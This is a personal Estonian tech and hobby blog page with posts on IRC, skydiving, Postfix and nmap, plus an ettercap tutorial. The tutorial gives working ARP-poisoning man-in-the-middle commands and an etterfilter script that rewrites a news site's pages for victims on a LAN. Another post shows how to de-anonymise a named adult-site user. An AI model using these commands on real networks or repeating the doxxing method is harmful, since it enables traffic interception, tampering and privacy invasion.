Skip to content

Margus Roo –

If you're inventing and pioneering, you have to be willing to be misunderstood for long periods of time

  • Cloudbreak Autoscale fix
  • Endast

Author: margusja

IRC stuff

Posted on June 15, 2007 - May 7, 2008 by margusja

Uh jah. Midagi ei püsi peas. Jamasin just hulk aega sellega et saada tagasi oma vana irc kanal.

Ok, et siis enam ei peaks seda teistkorda tegema siis siia kirja paar asja.

Founderiks saamine: /msg chanserv identify #Skydive parool
Founderi muutmine: /msg chanserv set #Skydive founder margusja
Sealt omakorda opiks: /chanserv op #skydive margusja
Kanali AOP|VOP list: /ChanServ AOP|VOP #Skydive LIST
Nüüd paneme ennast autoop listi, et siis ei peaks seda jama igakord tegema.
/chanserv AOP #Skydive ADD margusja

Chanserv on kanalil aga AOP ja VOP listid ei toimi. Lahendus oli /msg nickserv set noop off

Posted in helpLeave a comment

Social engineering

Posted on June 14, 2007 by margusja

Võtame täiskasvanutele mõeldud portaali www.sexinestonia.com Ilus kena. Huvitavad pildid. Lisaks kõigele kui detailvaadet vaadata siis näeme et paljud on täitnud kenasti ausalt ära vanuse.

http://www.sexinestonia.com/index.php?id=user&user=26285 üsna tagasihoidlik näide. Kena mimm. Tahaksite tema kohta rohkem infot aga palun siinkohal tuleb meile appi www.rate.ee otsing sisestate sinna otsingusse vastavalt sünni päeva, kuu ja aasta ja voila http://www.rate.ee/show.php?id=11534564

Posted in TurvalisusLeave a comment

Projekt referer

Posted on June 14, 2007 - June 15, 2007 by margusja

sex xxx naked girls gay lesbi pictures animalsex porno video hentai

Posted in FunLeave a comment

Minu videod

Posted on May 31, 2007 - October 8, 2007 by margusja

Kuna internetis lohakalt hoitud asjad valguvad laiali siis kogun siia oma langevarjuvideod.

Siin on siis videod mille olen ise purki püüdnud.

  • 07.10.2007 tegemised 56.1M
  • 30.09.2007 tegemised 92.5M
  • 23.09.2007 tegemised 124.4M
  • 8.09.2007 tegemisi 51.7M
  • 1.09.2007 õpilased 70.9M
  • 3-5 August Nurmsis 91.2M
  • SLK Kihnu 2007 laager 170M
  • Juuni 2007 Nurmsis, Kiviõli ja Rapla maandumine, Kodila ralli 149 M
  • 26 ja 27 Mai Nurmsis 115.2 M
  • 18 ja 19 Mai Nurmsis 189.3 M
  • 5 Mai Nurmsis 85.7 M
  • 14 Märts 2007 Nurmsis 19.8 M
Posted in LangevarjundusLeave a comment

Postfix & Sendmail stuff

Posted on April 24, 2007 - July 27, 2009 by margusja

postfix and regexp.
Juhul kui tahate kasutada postfix regexp mappe siis on tarvis lisada main.cf faili:
virtual_alias_maps = regexp:/path/regexp
Ning /path/regexp faili näitek kui ma tahan et margusja1@kodila.ee, margusja2@kodila.ee jne tuleksid aadressile margusja@kodila.ee rida:
/^margusja[0-9]+@kodila\.ee$/ margusja@kodila.ee
Kontrollida kas regexp reegel töötab saab:
postmap -q margusja1@kodila.ee regexp:/path/regexp

Kord juhtunud jälle nii, et mailid liiguvad kenasti aga mida ei ole on maillog. Viga oli syslog deemonis.

Suht plank postfix konfi juures juhtub see et kui sinu hallatavas postfix masinas on queue MAILER-DEAMON teateid täis, kus sinu postfix soovib remote saatjale teadata et ei ole sellist maili. 99 prossa pole neid saatjaid olemas.  abx mailq | grep MAILER | awk ‘{print $1}’ | sed s,*,,g | postsuper -d –

Interesting shell code.

mailq | tail +2 | grep -v ‘^ *(‘ | awk ‘BEGIN { RS = “” }
# $7=sender, $8=recipient1, $9=recipient2
{ if ($8 == “user@example.com” && $9 == “”)
print $1 }
‘ | tr -d ‘*!’ | postsuper -d –

Posted in LinuxLeave a comment

Lihtsalt minuarust lahe pilt.

Posted on March 25, 2007 - June 15, 2007 by margusja

My and Kelly(Doughter)

Posted in LapsedLeave a comment

Porine kevadhüppamine

Posted on March 15, 2007 by margusja

Päev läbi minu silmade. http://video.slk.ee/2007/Nurmsi-14-03-2007.wmv

Posted in LangevarjundusLeave a comment

Protected: Minu vajalikud serialid

Posted on February 22, 2007 - March 6, 2007 by margusja

This content is password protected. To view it please enter your password below:

Posted in Linux, Windows

Nmap

Posted on February 18, 2007 by margusja

Võrgu ja remote info kogumisel on üks asendamatu tool nmap. Paar näidet siin.
nmap -sV host hosti lahtised pordid ja seal reaalselt kuulavad teenused.
nmap -O -v OS detection.

Posted in Linux, TurvalisusLeave a comment

ettercap

Posted on February 16, 2007 - November 5, 2010 by margusja

Pluginad

[Thu Nov 04 23:05:58 margusja@IRack ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

No plugin found !

[Thu Nov 04 23:07:01 margusja@IRack

Not good 🙁

Parandame selle vea:

[Thu Nov 04 23:21:59 margusja@IRack sudo port install libtool
Warning: port definitions are more than two weeks old, consider using selfupdate
---> Computing dependencies for libtool
---> Fetching libtool
---> Attempting to fetch libtool-2.4.tar.gz from ftp://ftp.funet.fi/pub/gnu/prep/libtool
---> Verifying checksum(s) for libtool
---> Extracting libtool
---> Configuring libtool
---> Building libtool
---> Staging libtool into destroot
---> Installing libtool @2.4_0
---> Deactivating libtool @2.2.8_0+darwin
---> Activating libtool @2.4_0
---> Cleaning libtool
[Thu Nov 04 23:22:42 margusja@IRack

By default lastakse mac os x port all ettercap-ng kokku –disable-plugins võtmega. Siinkohal tuleks teha midagi sellist:

# sudo port
[turva/webserver] > edit ettercap-ng
configure.args --disable-gtk \
--with-openssl=${prefix} \
--disable-plugins \ <-- SEE RIDA KUSTUTADA --with-libpcap=${prefix} \ --with-libnet=${prefix} \ --with-libpcre=${prefix} \ --mandir=\\\${prefix}/share/man \ --infodir=\\\${prefix}/share/info

Nüüd uuesti configure ja install.

Tulemus:

[Fri Nov 05 19:17:57 margusja@IRack sudo /opt/local/bin/ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

arp_cop 1.1 Report suspicious ARP activity
autoadd 1.2 Automatically add new victims in the target range
chk_poison 1.1 Check if the poisoning had success
dns_spoof 1.1 Sends spoofed dns replies
dos_attack 1.0 Run a d.o.s. attack against an IP address
dummy 3.0 A plugin template (for developers)
find_conn 1.0 Search connections on a switched LAN
find_ettercap 2.0 Try to find ettercap activity
find_ip 1.0 Search an unused IP address in the subnet
finger 1.6 Fingerprint a remote host
finger_submit 1.0 Submit a fingerprint to ettercap's website
gre_relay 1.0 Tunnel broker for redirected GRE tunnels
gw_discover 1.0 Try to find the LAN gateway
isolate 1.0 Isolate an host from the lan
link_type 1.0 Check the link type (hub/switch)
pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
pptp_pap 1.0 PPTP: Forces PAP authentication
pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
rand_flood 1.0 Flood the LAN with random MAC addresses
remote_browser 1.2 Sends visited URLs to the browser
reply_arp 1.0 Simple arp responder
repoison_arp 1.0 Repoison after broadcast ARP
scan_poisoner 1.0 Actively search other poisoners
search_promisc 1.2 Search promisc NICs in the LAN
smb_clear 1.0 Tries to force SMB cleartext auth
smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
stp_mangler 1.0 Become root of a switches spanning tree

Sessioon 2010

Samal ajal tcpdump-ga faili

Siit edasi juba saab lugeda wireshark-i

Ettercap and wireshark

Ettercap http://ettercap.sourceforge.net/) on üks mega-power-tool ja niisama ajaviitmise riist ka. Siinkohal hakkan seda ise natuke lahkama ja panen siia siis kirja kuidas läheb. Aeg on näidanud et kui mingi asjaga ikka pidevalt ei tegele siis lähed rooste. Samas kui on kusagilt väga lihtsad näited võtta siis võib ka roostes ollas tuusa mulje jätta :)

* ettercap -P list - peaks andma kasutatavate pluginate listi

* ettercap -Tq -i [interface]-M arp:remote // - kogu LAN. Suurema kohtvõrgu puhul ei pruugi teie võrgukaart piisav olla. Kui soovi kindel grupp koosatada siis saab seda määrata /192.168.0.1(gw),100(victim1)/ - antud juhul olete 192.168.0.1 ja 192.168.0.100 liikluse vahel.

Võtame siis esimese ja kõige karmima case. LAN peal MITMA (Man In The Middle Attac)
Enne kui ilmusid switchid oli asi lihtne. Kõike pakette karjuti terve võrgu peale. Nüüd larjutakse kogu võrgule vähe, kuid siiski. Üks neist on ARP päringud. Kuna ARP toimib LAN peal siis ei peeta seda kuigi ohtlikuks. KUID!!! Tuleb teie kontorise klient ja soovib oma sülearvuti panna teie sisevõrku ja kogub umbes 1h jooksul kõik liikluse oma arvutisse. Hiljem siis kodus analüüsib seda ja... edasi te ei taha teada.
Kuidas ta seda siis teeb.
LINUX: echo 1 > /proc/sys/net/ipv4/ip_forward BSD: sysctl -w net.inet.ip.forwarding=1

- Seda selleks et liiklus arvutisse pidama ei jääks.
ettercap -o -T -P repoison_arp -M arp:remote /VIGTIM IP/ /GW IP/

Mis iganes on vahepeal arenenud (29.05.2008) aga MAX OS X 10.5 ja port pealt kokku lastud ettercap pelab siin: ettercap -a -i en(n) victimIP GW-IP. Kõrvale wireshark käima ja oled kohe terve LAN-i hirm ja kunn.

Mis siis toimub. LAN peal on switchides ja arvutites ARP tabelid kus on kirjas IP aadress ja MAC aadress. Kui nüüd mingi paket LAN peal liigub siis paketi sees on src IP ja target IP masinad siis võrdlevad ARP tablelitest kuhu MACi peale seda saata. Kuna aga ARPi võivad LAN peal saata kõik siis võib häkker karjuda LAN peale et tema mac on GW mac. Sellest piisab et kogu liiklus või siis vastava arvuti liiklus käib läbi häkkeri arvuti.
---

etterfilter - Päris põnev mänguasi millega saad mõjutada enda käes olevat liiklust.

Võtame lehe www.delfi.ee

avame tekstieditori ja kirjutame sinna:

# Kuna veebiserverid saadavad vastuseid pakitult ja meie ei soovi seda siis lihtsalt saadame serverile suvalise encodingu, peaasi et sama pika. Nüüd peaksime vastu puhast teksit saama

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}

# antud osa on juba igaühe enda teha. Siin lihtsalt näide.
if (ip.proto == TCP && tcp.src == 80) {
replace("Loe", "Jipikajee mader fakker");
msg("Filter Ran.\n");
}

Kompileerime:

etterfilter delfi.filter -o delfi.ef

ja käivitame rünnaku:

ettercap -i en1 -T -q -F delfi.ef -M ARP // või /192.168.0.1(gw),100(victim 192.168.0.100)

Kui nüüd kõik kenasti laabus, seal on veel omad nipid ja nõksud, vahel peab root kasutaja alt tegema või siis vajalikes kohas vajalikud õigused, igatahes kui nüüd sama LAN-i peale keegi www.delfi.ee peale satub siis võib ta seal Loe asemel suht naljakat asja kohata.

See oli lihtsalt näide. Antud lõik ei kutsu kuidagi delfi.ee maha tegema vaid oli suvaline näide.

Kui sina võid seda teha siis võib seda ükskõik kes. Seega kontrolli kas võrk on puhas sinusugustest.

* ettercap -c -N

* ettercap -l -N annab hea ülevaate võrgus asuvate masinate IP-de ja MAC aadressidest.

Posted in Linux, TurvalisusLeave a comment

Posts navigation

Older posts
Newer posts

The Master

Categories

  • Apache
  • Apple
  • Assembler
  • Audi
  • BigData
  • BMW
  • C
  • Elektroonika
  • Fun
  • Hadoop
  • help
  • Infotehnoloogia koolis
  • IOT
  • IT
  • IT eetilised
  • Java
  • Langevarjundus
  • Lapsed
  • lastekodu
  • Linux
  • M-401
  • Mac
  • Machine Learning
  • Matemaatika
  • Math
  • MSP430
  • Muusika
  • neo4j
  • openCL
  • Õpetaja identiteet ja tegevusvõimekus
  • oracle
  • PHP
  • PostgreSql
  • ProM
  • R
  • Turvalisus
  • Varia
  • Windows
Proudly powered by WordPress | Theme: micro, developed by DevriX.